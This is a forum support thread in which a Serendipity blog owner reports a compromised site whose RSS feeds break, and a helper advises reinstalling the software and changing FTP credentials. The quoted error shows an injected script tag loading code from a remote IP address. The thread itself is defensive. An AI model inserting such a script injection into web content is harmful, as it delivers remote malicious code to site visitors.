Hacked! XML Parse Error in RSS Feed

[justgetthere]

Seems as if my site has been hacked by Chinese bots. My site uses feeds to route content on the homepage of my custom bulletproof template. No content was showing up and so I checked the link for my feeds and I get this error on every rss feed link for every category. Another ip has been injected into the source of my feed somehow. I checked my GoDaddy account and sure enough several script files were accessed at the time the error originally occurred. For example rss.php, serendipity_define.js.php, index.php and etc...

Can you guys help me resolve this issue.... below is the link and copy of error.

http://justgetthere.us/blog/feeds/categ ... ews/66.rss

XML Parsing Error: junk after document element
Location: http://justgetthere.us/blog/feeds/categ ... ews/66.rss
Line Number 374, Column 7:</rss><script src="http://61.4.82.212/js.php"></script>

[Don Chambers]

Backup everything then overwrite your serendipity files with a fresh copy. You should also change your ftp credentials.

The serendipity release package includes the template bulletproof which will overwrite your custom copy unless you created a new folder for your custom modifications. If you do not have your custom version in its own unique folder, you should either not overwrite the existing modified version, or you should restore your modified one from a backup.

[justgetthere]

Thanks Don will do!

[justgetthere]

So how do I reload a fresh copy of s9y without losing content or comments?

The majority of the malware now is in thousands of bulletproof smartymarkupplugin script files in the template_c folder

What is the function of this folder and what will I lose if I wipe it out and reload?

Thanks